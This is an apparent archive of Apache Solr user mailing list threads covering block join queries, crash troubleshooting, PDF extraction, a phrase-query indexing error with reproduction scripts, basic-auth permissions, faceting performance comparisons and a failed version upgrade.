On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does the v parameter work in place of the query following {!parsername} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}






Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
Thank you, Mikhail. But this didn't work. The first {!parent which='...' 
v='...'} alone works. But the second {!parent ...} clause is completely ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the second 
query but parsedquery and parsedquery_toString only have the first query. BTW, 
does the v parameter work in place of the query following {!parsername} for
any parser?



On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}




Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr

I have a document with child documents like:

<doc>
  <field name="id">maindoc_121</field>
  <field name="isParent">true</field>
  <doc>
    <field name="id">child_121_1</field>
    <field name="attrname">genre</field>
    <field name="attrvalue">drama</field>
  </doc>
  <doc>
    <field name="id">child_121_2</field>
    <field name="attrname">country</field>
    <field name="attrvalue">USA</field>
  </doc>
</doc>
The child documents have the same set of fields.

I can write a query for a parent that has a child with attrname=genre and
attrvalue=drama as

q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama


But if I want to add another condition, that the parent must have another child
that has certain values, what do I do?


q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND 
attrname:country AND attrvalue:USA


would mean a query for a parent where one child must match all of those
clauses. I want a parent that has two children: one matched by the first
sub-query, and another matched by the second.


TK




Re: Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr

On 6/5/18 10:31 AM, Christopher Schultz wrote:


How about Apache procrun/commons-daemon?

https://commons.apache.org/proper/commons-daemon/procrun.html

Thank you, I'll take a look.

On 6/5/18 1:51 PM, Shawn Heisey wrote:

The best bet for
an easy service install is probably NSSM.  It's got a name that some
people hate, but a lot of people use it successfully.

https://nssm.cc/

Thank you, I'll take a look at this one too.


You mentioned looking at a GC log.  Can you provide that entire log for
analysis?
Thank you for your offer to help, but I don't really think this is a
memory-related issue.
I visualized the GC log with GCMV (GCVM?) and the graph shows Solr was using 
less than half of the heap space at the peak.

This Solr doesn't get much query traffic and no indexing was running.
It's really a sudden death of JVM with no trace.

The only concern I have is that the Solr config files are those of Solr 5.x,
and they just upgraded to Solr 6.6. But I understand Solr 6 supports a Solr
5-compatible mode. Have there been any issues with the compatibility mode?


TK





Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
My client's Solr 6.6 running on a Windows server is mysteriously crashing 
without any JVM crash log. No unusual activities recorded in solr.log. GC log 
does not indicate the OOM situation. It's a simple single-core, single node 
deployment (no solrCloud). It has very light load. No indexing activities were 
running near the crash time.


After exhausting all possibilities (suggestions are welcome), I'd like to 
recommend installing some monitoring software, but I couldn't find one that 
works on Windows for Java-based software. (Some I found can monitor only EXEs; 
since all Java software shares the same EXE, java.exe, those won't work.) Can 
anyone recommend one? It doesn't need to be free but can't be very expensive, 
since it's a very lightly used Solr system. Perhaps less than $500?


TK




Re: Run solr server using Java program

2018-04-21 Thread TK Solr
The solr.cmd script starts Solr by running java -jar start.jar; start.jar has a 
MANIFEST file that tells the java command that its main class is 
org.eclipse.jetty.start.Main.


So, I would think your Java program should be able to start Solr (Jetty, really) 
by calling org.eclipse.jetty.start.Main.main(argv).
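A minimal, untested sketch of that idea (it assumes start.jar and Jetty's
start classes are on the classpath, and that the working directory is the
Solr server directory, exactly as the startup script arranges):

public class SolrLauncher {
    public static void main(String[] args) throws Exception {
        // Equivalent to running "java -jar start.jar" from the Solr server
        // directory; arguments pass straight through to Jetty's start mechanism.
        org.eclipse.jetty.start.Main.main(args);
    }
}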


But a big question is why you'd like to do that.

TK

On 4/18/18 7:34 AM, rameshkjes wrote:

Hi guys,

I am able to run the solr instance, add the core and import the data
manually. But I want to do everything with the help of Java program, I
searched a lot but did not find any relevant answer.

In order to run the Solr server, I execute the following command inside the
directory D:\software\solr-7.2.0\solr-7.2.0\bin:

solr.cmd -s "C:\Users\lucky\github\myproject\solr-config"

After that I access http://localhost:8983/solr/

and select the name of the core, which is "demo",

and then I select the dataimport tab and "execute" to import documents.

The first thing I tried was to run the Solr server from a Java program, which
I am unable to do. Could anyone please help with that?

I am using Solr 7.2.0

Thanks



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html





Minimum memory requirement

2018-01-31 Thread TK Solr
On my AWS t2.micro instance, which only has 1 GB of memory, I installed Solr 
(4.7.1 - please don't ask) and tried to run it in the sample directory as 
java -jar start.jar. It exited shortly afterwards due to lack of memory.


How much memory does Solr require to run with an empty core?

TK




literal.* use in posting PDF files

2018-01-30 Thread TK Solr
I have a schema.xml defined to require two fields, "id" and "libDocumentID". 
solrconfig.xml is the standard one.


Using curl, I tried posting a PDF file like this:

curl 'http://localhost:8983/solr/update/extract?literal.id=foo&df=foo&commit=true' \
  -F "myfile=@foo.pdf"


but I got:

[doc=foo.pdf] missing required field: libDocumentID (status 400)


Can I specify more than one literal.name=value? Do I have to define 
literal.libDocumentID in solrconfig.xml?


I'm using Solr 5.3.1 (please don't ask...).

TK
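For the archives: the extract handler does accept multiple literal.*
parameters on one request, so the missing field can be supplied the same way
as id. A hedged SolrJ 5.x sketch (the core URL and the libDocumentID value
are made up):

import java.io.File;
import org.apache.solr.client.solrj.SolrClient;
import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.client.solrj.request.ContentStreamUpdateRequest;

public class ExtractPdf {
    public static void main(String[] args) throws Exception {
        SolrClient client = new HttpSolrClient("http://localhost:8983/solr/mycore");
        ContentStreamUpdateRequest req = new ContentStreamUpdateRequest("/update/extract");
        req.addFile(new File("foo.pdf"), "application/pdf");
        req.setParam("literal.id", "foo");                // one literal.* per field...
        req.setParam("literal.libDocumentID", "LIB-123"); // ...so add as many as needed
        req.setParam("commit", "true");
        client.request(req);
        client.close();
    }
}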




Bitnami, or other Solr on AWS recommendations?

2018-01-26 Thread TK Solr
If I want to deploy Solr on AWS, do people recommend using the prepackaged 
Bitnami Solr image? Or is it better to install Solr manually on a compute 
instance? Or is there a better way?


TK




Re: Extended characters

2017-10-29 Thread TK Solr

I think you can use ASCIIFoldingFilter

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html

by inserting its factory in your schema.

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html

I would suggest making a separate field for this so that exact match can be 
boosted.
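A minimal Lucene-level sketch of the folding effect (the analyzer chain here
is an illustration, not your schema; in Solr you would express the same thing
with the factory inside the field type):

import java.io.StringReader;
import org.apache.lucene.analysis.Analyzer;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.analysis.Tokenizer;
import org.apache.lucene.analysis.core.LowerCaseFilter;
import org.apache.lucene.analysis.miscellaneous.ASCIIFoldingFilter;
import org.apache.lucene.analysis.standard.StandardTokenizer;
import org.apache.lucene.analysis.tokenattributes.CharTermAttribute;

public class FoldingDemo {
    public static void main(String[] args) throws Exception {
        Analyzer analyzer = new Analyzer() {
            @Override
            protected TokenStreamComponents createComponents(String fieldName) {
                Tokenizer source = new StandardTokenizer();
                TokenStream sink = new LowerCaseFilter(source);
                sink = new ASCIIFoldingFilter(sink);  // "Ensō" becomes "enso"
                return new TokenStreamComponents(source, sink);
            }
        };
        try (TokenStream ts = analyzer.tokenStream("f", new StringReader("Ensō"))) {
            CharTermAttribute term = ts.addAttribute(CharTermAttribute.class);
            ts.reset();
            while (ts.incrementToken()) {
                System.out.println(term.toString());  // prints: enso
            }
            ts.end();
        }
    }
}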

On 10/29/17 10:56 AM, Robert Brown wrote:

Hi,

I have a text field in my index containing extended characters, which I'd like 
to match against when searching without the extended characters.


e.g.  field contains "Ensō" which I want to match when searching for just 
"enso".

My current config for that field (type) is given below:


<fieldType ... autoGeneratePhraseQueries="true">
  <analyzer type="index">
    ...
    <filter ... synonyms="index_synonyms.txt" ignoreCase="true" expand="true" />
    <filter ... words="lang/stopwords_en.txt" />
    ...
  </analyzer>
  <analyzer type="query">
    ...
    <filter ... words="lang/stopwords_en.txt" />
    ...
  </analyzer>
</fieldType>

Kuro


Re: Work-around for "indexed without position data"

2017-07-03 Thread Solr User
Not sure if it helps beyond the steps to reproduce that I supplied above,
but I also see that "Omit Term Frequencies & Positions" is still set on the
field according to the LukeRequestHandler:

ITS--OF--



On Mon, Jun 5, 2017 at 1:18 PM, Solr User <solr...@gmail.com> wrote:

> Sorry for the delay.  I was able to reproduce this easily with my setup,
> but reproducing this on a Solr example proved challenging.  Hopefully the
> work that I did to find the situation in which this is produced will help
> in resolving the problem.  The driving factor for this appears to be how
> updates are sent to Solr.  When sending batches of updates with commits,
> the problem is reproduced.  If the commit is held until after all updates
> are sent, then no problem is produced.  This leads me to believe that this
> issue has something to do with overlapping commits or index merges.  This
> was reproducible regardless of running classic or managed schema and
> regardless of running Solr core or SolrCloud.
>
> There are not many steps to reproduce this, but you will need a way to
> send these updates.  I have included inline create.sh and create.pl
> scripts to generate the data and send the updates.  You can index a
> lastModified field or something to convince yourself that everything has
> been re-indexed.  I left that out to keep the steps lean.  Also, this test
> is using commit statements from the client sending the updates for
> simplicity even though it is not a good practice.  My normal setup is using
> Solrj with commitWithin to allow Solr to manage when the commits take
> place, but the same error is produced either way.
>
>
> *STEPS TO REPRODUCE*
>
>1. Install Solr 5.5.3 and change to that working directory
>2. bin/solr -e techproducts
>3. bin/solr stop [Why these next 3 steps?  These are to start the
>index completely new without the 32 example documents as opposed to a
>delete query.  The documents are not posted after the core is detected the
>second time.]
>4. rm -rf ./example/techproducts/solr/techproducts/data/
>5. bin/solr -e techproducts
>6. ./create.sh
>7. curl -X POST -H 'Content-type:application/json' --data-binary '{
>"replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true,
>"multiValued":true, "stored":true } }' http://localhost:8983/solr/
>techproducts/schema
>8. http://localhost:8983/solr/techproducts/select?q=cat:%
>22hard%20drive%22  [error]
>9. ./create.sh
>10. http://localhost:8983/solr/techproducts/select?q=cat:%
>22hard%20drive%22  [error even though all documents have been
>re-indexed]
>
> *create.sh*
> #!/bin/bash
> for i in {1..100}; do
> echo "$i"
> ./create.pl $i > ./create.xml$i
> curl http://localhost:8983/solr/techproducts/update?commit=true -H
> "Content-Type: text/xml" --data-binary @./create.xml$i
> done
>
> *create.pl*
> #!/usr/bin/perl
> my $S = $ARGV[0];
> my $I = 100;
> my $N = $S*$I + $I;
> my $i;
> # emit one <add> batch of 100 docs in Solr XML update format
> print "<add>\n";
> for($i=$S*$I; $i<$N; $i++) {
>    print "<doc><field name=\"id\">SP${i}</field><field name=\"cat\">hard drive ${i}</field></doc>\n";
> }
> print "</add>\n";
>
>
> On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote:
>
>> Can you reproduce this error? What are the steps you take to reproduce
>> it? ( simple is better).
>>
>> cheers -- Rick
>>
>>
>>
>> On 2017-05-25 05:46 PM, Solr User wrote:
>>
>>> This is in regards to changing a field type from string to
>>> text_en_splitting, re-indexing all documents, even optimizing to give the
>>> index a chance to merge segments and rewrite itself entirely, and then
>>> getting this error when running a phrase query:
>>> java.lang.IllegalStateException: field "blah" was indexed without
>>> position
>>> data; cannot run PhraseQuery
>>>
>>> I have encountered this issue before and have always done one of the
>>> following as a work-around:
>>> 1.  Instead of changing the field type on an existing field just create a
>>> new field and retire the old one.
>>> 2.  Delete the index directory and start from scratch.
>>>
>>> These work-arounds are not always ideal.  Does anyone know what is
>>> holding
>>> onto that old field type definition?  What thinks it is still a string?
>>> Every document has been re-indexed and I am sure of this because I have a
>>> time stamp indexed.  Is there any other way to get this to work?
>>>
>>> For what it is worth, I am running this in SolrCloud mode but I remember
>>> seeing this issue before SolrCloud was released as well.
>>>
>>>
>>
>


Re: Anonymous Read?

2017-06-06 Thread Solr User
Thanks!  The null role value did the trick.  I tried this with the
predefined permissions and it worked as well.  Thanks again!

On Tue, Jun 6, 2017 at 2:08 PM, Oakley, Craig (NIH/NLM/NCBI) [C] <
craig.oak...@nih.gov> wrote:

> We usually end security.json with the permissions
>
>    {
>     "name":"open_select",
>     "path":"/select/*",
>     "role":null},
>    {
>     "name":"all-admin",
>     "collection":null,
>     "path":"/*",
>     "role":"allgen"},
>    {
>     "name":"all-core-handlers",
>     "path":"/*",
>     "role":"allgen"}]
>   } }
>
>
> ...and then assign the "allgen" role to all users
>
> This allows a select without a login & password, but requires a login &
> password for anything else (including the front page of the GUI)
>
> -Original Message-
> From: Solr User [mailto:solr...@gmail.com]
> Sent: Tuesday, June 06, 2017 2:27 PM
> To: solr-user@lucene.apache.org
> Subject: Anonymous Read?
>
> Is it possible to setup Solr security to allow anonymous query (/select
> etc.) but restricted access to other permissions as described in
> https://lucidworks.com/2015/08/17/securing-solr-basic-
> auth-permission-rules/
> ?
>
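A small SolrJ 6.x sketch of what the null-role rule above buys you (collection
URL and credentials are placeholders): /select works anonymously, while
requests to role-guarded paths need credentials attached per request.

import org.apache.solr.client.solrj.SolrQuery;
import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.client.solrj.request.QueryRequest;

public class AnonVsAuthed {
    public static void main(String[] args) throws Exception {
        HttpSolrClient client =
            new HttpSolrClient.Builder("http://localhost:8983/solr/mycoll").build();
        // Anonymous: allowed by the "role":null rule on /select/*
        System.out.println(client.query(new SolrQuery("*:*")).getResults().getNumFound());
        // Authenticated: required for anything guarded by the "allgen" role
        QueryRequest req = new QueryRequest(new SolrQuery("*:*"));
        req.setBasicAuthCredentials("someuser", "somepassword");
        req.process(client);
        client.close();
    }
}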


Anonymous Read?

2017-06-06 Thread Solr User
Is it possible to setup Solr security to allow anonymous query (/select
etc.) but restricted access to other permissions as described in
https://lucidworks.com/2015/08/17/securing-solr-basic-auth-permission-rules/
?


Re: Work-around for "indexed without position data"

2017-06-05 Thread Solr User
Sorry for the delay.  I was able to reproduce this easily with my setup,
but reproducing this on a Solr example proved challenging.  Hopefully the
work that I did to find the situation in which this is produced will help
in resolving the problem.  The driving factor for this appears to be how
updates are sent to Solr.  When sending batches of updates with commits,
the problem is reproduced.  If the commit is held until after all updates
are sent, then no problem is produced.  This leads me to believe that this
issue has something to do with overlapping commits or index merges.  This
was reproducible regardless of running classic or managed schema and
regardless of running Solr core or SolrCloud.

There are not many steps to reproduce this, but you will need a way to send
these updates.  I have included inline create.sh and create.pl scripts to
generate the data and send the updates.  You can index a lastModified field
or something to convince yourself that everything has been re-indexed.  I
left that out to keep the steps lean.  Also, this test is using commit
statements from the client sending the updates for simplicity even though
it is not a good practice.  My normal setup is using Solrj with
commitWithin to allow Solr to manage when the commits take place, but the
same error is produced either way.


*STEPS TO REPRODUCE*

   1. Install Solr 5.5.3 and change to that working directory
   2. bin/solr -e techproducts
   3. bin/solr stop [Why these next 3 steps?  These are to start the
   index completely new without the 32 example documents as opposed to a
   delete query.  The documents are not posted after the core is detected the
   second time.]
   4. rm -rf ./example/techproducts/solr/techproducts/data/
   5. bin/solr -e techproducts
   6. ./create.sh
   7. curl -X POST -H 'Content-type:application/json' --data-binary '{
   "replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true,
   "multiValued":true, "stored":true } }'
   http://localhost:8983/solr/techproducts/schema
   8.
   http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22
   [error]
   9. ./create.sh
   10.
   http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22
   [error even though all documents have been re-indexed]

*create.sh*
#!/bin/bash
for i in {1..100}; do
echo "$i"
./create.pl $i > ./create.xml$i
curl http://localhost:8983/solr/techproducts/update?commit=true -H
"Content-Type: text/xml" --data-binary @./create.xml$i
done

*create.pl*
#!/usr/bin/perl
my $S = $ARGV[0];
my $I = 100;
my $N = $S*$I + $I;
my $i;
# emit one <add> batch of 100 docs in Solr XML update format
print "<add>\n";
for($i=$S*$I; $i<$N; $i++) {
   print "<doc><field name=\"id\">SP${i}</field><field name=\"cat\">hard drive ${i}</field></doc>\n";
}
print "</add>\n";


On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote:

> Can you reproduce this error? What are the steps you take to reproduce it?
> ( simple is better).
>
> cheers -- Rick
>
>
>
> On 2017-05-25 05:46 PM, Solr User wrote:
>
>> This is in regards to changing a field type from string to
>> text_en_splitting, re-indexing all documents, even optimizing to give the
>> index a chance to merge segments and rewrite itself entirely, and then
>> getting this error when running a phrase query:
>> java.lang.IllegalStateException: field "blah" was indexed without
>> position
>> data; cannot run PhraseQuery
>>
>> I have encountered this issue before and have always done one of the
>> following as a work-around:
>> 1.  Instead of changing the field type on an existing field just create a
>> new field and retire the old one.
>> 2.  Delete the index directory and start from scratch.
>>
>> These work-arounds are not always ideal.  Does anyone know what is holding
>> onto that old field type definition?  What thinks it is still a string?
>> Every document has been re-indexed and I am sure of this because I have a
>> time stamp indexed.  Is there any other way to get this to work?
>>
>> For what it is worth, I am running this in SolrCloud mode but I remember
>> seeing this issue before SolrCloud was released as well.
>>
>>
>


Work-around for "indexed without position data"

2017-05-25 Thread Solr User
This is in regards to changing a field type from string to
text_en_splitting, re-indexing all documents, even optimizing to give the
index a chance to merge segments and rewrite itself entirely, and then
getting this error when running a phrase query:
java.lang.IllegalStateException: field "blah" was indexed without position
data; cannot run PhraseQuery

I have encountered this issue before and have always done one of the
following as a work-around:
1.  Instead of changing the field type on an existing field just create a
new field and retire the old one.
2.  Delete the index directory and start from scratch.

These work-arounds are not always ideal.  Does anyone know what is holding
onto that old field type definition?  What thinks it is still a string?
Every document has been re-indexed and I am sure of this because I have a
time stamp indexed.  Is there any other way to get this to work?

For what it is worth, I am running this in SolrCloud mode but I remember
seeing this issue before SolrCloud was released as well.
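For anyone digging into this later: the stale typing most likely lives in
Lucene's per-segment FieldInfos, and a phrase query needs positions in every
segment it touches, so a single old segment that survived merging is enough
to trigger the exception. A hedged Lucene-level sketch for inspecting that
(index path and field name are placeholders):

import java.nio.file.Paths;
import org.apache.lucene.index.DirectoryReader;
import org.apache.lucene.index.FieldInfo;
import org.apache.lucene.index.LeafReaderContext;
import org.apache.lucene.store.FSDirectory;

public class ShowIndexOptions {
    public static void main(String[] args) throws Exception {
        try (DirectoryReader reader =
                 DirectoryReader.open(FSDirectory.open(Paths.get("/path/to/data/index")))) {
            for (LeafReaderContext ctx : reader.leaves()) {
                FieldInfo fi = ctx.reader().getFieldInfos().fieldInfo("blah");
                // DOCS_AND_FREQS_AND_POSITIONS is required for phrase queries; a
                // segment still reporting DOCS carries the old string-era options.
                System.out.println("segment " + ctx.ord + ": "
                        + (fi == null ? "field absent" : fi.getIndexOptions()));
            }
        }
    }
}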


Re: Faceting and Grouping Performance Degradation in Solr 5

2017-02-06 Thread Solr User
I am pleased to report that we are in Production on Solr 5.5.3 with
comparable performance to Solr 4.8.1 through leveraging facet.method=uif as
well as https://issues.apache.org/jira/browse/SOLR-9176.  Thanks to
everyone who worked on these!
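For anyone who lands here, a short SolrJ sketch of requesting that method per
query (the field names are examples):

import org.apache.solr.client.solrj.SolrQuery;

public class UifFacetQuery {
    public static SolrQuery build() {
        SolrQuery q = new SolrQuery("*:*");
        q.setFacet(true);
        q.addFacetField("category", "brand"); // example multi-valued fields
        q.set("facet.method", "uif");         // per-request facet method hint
        return q;
    }
}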

On Mon, Oct 3, 2016 at 3:55 PM, Solr User <solr...@gmail.com> wrote:

> Below is some further testing.  This was done in an environment that had
> no other queries or updates during testing.  We ran through several
> scenarios, laid out in the table below.  The times are average times in
> milliseconds.  Same test methodology as above except there was a 5-minute
> warmup and a 15-minute test.
>
> Note that both the segment and deletions were recorded from only 1 out of
> 2 of the shards so we cannot try to extrapolate a function between them and
> the outcome.  In other words, just view them as "non-optimized" versus
> "optimized" and "has deletions" versus "no deletions".  The only exceptions
> are the 0 deletes were true for both shards and the 1 segment and 8 segment
> cases were true for both shards.  A few of the tests were repeated as well.
>
> The only conclusion that I could draw is that the number of segments and
> the number of deletes appear to greatly influence the response times, at
> least more than any difference in Solr version.  There also appears to be
> some external contributor to variance... maybe network, etc.
>
> Thoughts?
>
>
> Date        Solr Version  Deleted Docs  Segments  facet.method=uif  Scenario #1  Scenario #2
> 9/29/2016   5.5.2         57873         34        YES               198          92
> 9/29/2016   5.5.2         57873         34        YES               210          88
> 9/29/2016   4.8.1         176958        18        N/A               145          59
> 9/30/2016   4.8.1         593694        27        N/A               186          62
> 9/30/2016   4.8.1         593694        27        N/A               190          58
> 9/30/2016   5.5.2         57873         34        YES               208          72
> 9/30/2016   5.5.2         57873         34        YES               209          70
> 9/30/2016   5.5.2         57873         34        NO                210          77
> 9/30/2016   5.5.2         57873         34        NO                206          74
> 9/30/2016   5.5.2         0             8         NO                109          68
> 9/30/2016   5.5.2         0             8         YES               142          73
> 9/30/2016   5.5.2         0             1         YES               73           63
> 9/30/2016   5.5.2         0             1         NO                70           61
> 10/3/2016   4.8.1         0             8         N/A               160          66
> 10/3/2016   4.8.1         0             8         N/A               109          54
> 10/3/2016   4.8.1         0             1         N/A               83           52
> 10/3/2016   4.8.1         0             1         N/A               85           51
>
>
>
>
> On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote:
>
>> I plan to re-test this in a separate environment that I have more control
>> over and will share the results when I can.
>>
>> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:
>>
>>> Certainly.  And I would of course welcome anyone else to test this for
>>> themselves especially with facet.method=uif to see if that has indeed
>>> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
>>> testing is invalid due to variance, problem in process, etc.  One thing I
>>> was pondering is if I should force merge the index to a certain amount of
>>> segments because indexing yields a random number of segments and
>>> deletions.  The only thing stopping me short of doing that were
>>> observations of longer Solr 4 times even with more deletions and similar
>>> number of segments.
>>>
>>> We use Soasta as our testing tool.  Before testing, load is sent for
>>> 10-15 minutes to make sure any Solr caches have stabilized.  Then the test
>>> is run for 30 minutes of steady volume with Scenario #1 tested at 15
>>> req/sec and Scenario #2 tested at 100 req/sec.  Each request is different
>>> with input being pulled from data files.  The requests are repeatable test
>>> to test.
>>>
>>> The numbers posted above are average response times as reported by
>>> Soasta.  However, respective time differences are supported by Splunk which
>>> indexes the Solr logs and Dynatrace which is instrumented on one of the
>>> JVM's.
>>>
>>> The versions are deployed to the same machines thereby overlaying the
>>> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
>>> the same input data.  Being in SolrCloud mode, the full indexing comprises
>>> of indexing all documents and then deleting any that were not touched.
>>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
>>> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
>>> results as the previous Solr 4 test.
>>>
>>>
>>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
>>>

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Thanks Shawn. Yes, I did index some docs after moving to 6.4.0. The release
notes did not mention anything about the format being changed, so I thought it
would be backward compatible. Yeah, my only recourse is to re-index the data.
Apart from that, there were weird problems overall with 6.4.0. I was excited
about using the unified highlighter, but the ZooKeeper flakiness, the constant
disconnections of Solr, and the occasional failure to elect a leader for some
collections made me roll back.

Anyway, thanks for promptly responding; I will be more careful next time.

Thanks

Ravi Kiran Bhaskar



On Thu, Feb 2, 2017 at 9:41 AM, Shawn Heisey <apa...@elyograg.org> wrote:

> On 2/2/2017 7:23 AM, Ravi Solr wrote:
> > When I try to roll back from 6.4.0 to my original version of 6.0.1, it now
> > throws another issue. Now I can't go to 6.4.0, nor can I roll back to 6.0.1.
> >
> > Could not load codec 'Lucene62'.  Did you forget to add
> > lucene-backward-codecs.jar?
> > at org.apache.lucene.index.SegmentInfos.readCodec(
> SegmentInfos.java:429)
> > at
> > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349)
> > at
> > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284)
> >
> > Hope this doesn't cost me dearly. Any ideas, at least, on how to roll back
> > safely?
>
> This sounds like you did some indexing after the upgrade, or possibly
> some index optimizing, so the parts of the index that were written (or
> merged) by the newer version are now in a format that the older version
> cannot use.  Perhaps the merge policy was changed, causing Solr to do
> some automatic merges once it started up.  I am not aware of anything in
> Solr that would write new segments without indexing input or a merge
> policy change.
>
> As far as I know, there is no straightforward way to go backwards with
> the index format.  If you want to downgrade and don't have a backup of
> your indexes from before the upgrade, you'll probably need to wipe the
> index directory and completely reindex.
>
> Solr will always use the newest default index format for new segments
> when you upgrade.  Contrary to many user expectations, setting
> luceneMatchVersion will *NOT* affect the index format, only the behavior
> of components that do field analysis.
>
> Downgrading the index format would involve writing a custom Lucene
> program that changes the active index format to the older version, then
> runs a forceMerge on the index.  It would be completely separate from
> Solr, and definitely not straightforward.
>
> Thanks,
> Shawn
>
>


Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Thanks Hendrik. I am baffled as to why I did not hit this issue prior to
moving to 6.4.0.

On Thu, Feb 2, 2017 at 7:58 AM, Hendrik Haddorp <hendrik.hadd...@gmx.net>
wrote:

> Might be that your overseer queue got overloaded. Similar to what is described
> here:
> https://support.lucidworks.com/hc/en-us/articles/203959903-
> Bringing-up-downed-Solr-servers-that-don-t-want-to-come-up
>
> If the overseer queue gets too long you get hit by this:
> https://github.com/Netflix/curator/wiki/Tech-Note-4
>
> Try to request the overseer status 
> (/solr/admin/collections?action=OVERSEERSTATUS).
> If that fails you likely hit that problem. If so you can also not use the
> ZooKeeper command line client anymore. You can now restart all your ZK
> nodes with an increased jute.maxbuffer value. Once ZK is restarted you can
> use the ZK command line client with the same jute.maxbuffer value and check
> how many entries /overseer/queue has in ZK. Normally there should be a few
> entries but if you see thousands then you should delete them. I used a few
> lines of Java code for that, again setting jute.maxbuffer to the same
> value. Once cleaned up restart the Solr nodes one by one and keep an eye on
> the overseer status.
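A minimal sketch of those few lines of Java (the ensemble address and buffer
size are placeholders; delete children of /overseer/queue only after
confirming the queue really is flooded):

import org.apache.zookeeper.ZooKeeper;

public class OverseerQueueCleanup {
    public static void main(String[] args) throws Exception {
        // Same raised limit the restarted ZK nodes use, so large znodes can be read
        System.setProperty("jute.maxbuffer", String.valueOf(64 * 1024 * 1024));
        ZooKeeper zk = new ZooKeeper("zk1:2181,zk2:2181,zk3:2181", 30000, event -> {});
        for (String child : zk.getChildren("/overseer/queue", false)) {
            zk.delete("/overseer/queue/" + child, -1); // -1 matches any version
        }
        zk.close();
    }
}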
>
>
> On 02.02.2017 10:52, Ravi Solr wrote:
>
>> Following up on my previous email, the intermittent server unavailability
>> seems to be linked to the interaction between Solr and Zookeeper. Can
>> somebody help me understand what this error means and how to recover from
>> it.
>>
>> 2017-02-02 09:44:24.648 ERROR
>> (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr
>> x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3)
>> [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4]
>> o.a.s.c.RecoveryStrategy Error while trying to recover.
>> core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperE
>> xception$SessionExpiredException:
>> KeeperErrorCode = Session expired for /overseer/queue/qn-
>>  at org.apache.zookeeper.KeeperException.create(KeeperException.
>> java:127)
>>  at org.apache.zookeeper.KeeperException.create(KeeperException.
>> java:51)
>>  at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl
>> ient.java:391)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl
>> ient.java:388)
>>  at
>> org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(Zk
>> CmdExecutor.java:60)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388)
>>  at
>> org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1215)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1128)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1124)
>>  at
>> org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoverySt
>> rategy.java:334)
>>  at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.
>> java:222)
>>  at
>> com.codahale.metrics.InstrumentedExecutorService$Instrumente
>> dRunnable.run(InstrumentedExecutorService.java:176)
>>  at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>>  at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>>  at
>> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolE
>> xecutor.lambda$execute$0(ExecutorUtil.java:229)
>>  at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPool
>> Executor.java:1142)
>>  at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoo
>> lExecutor.java:617)
>>  at java.lang.Thread.run(Thread.java:745)
>>
>> Thanks
>>
>> Ravi Kiran Bhaskar
>>
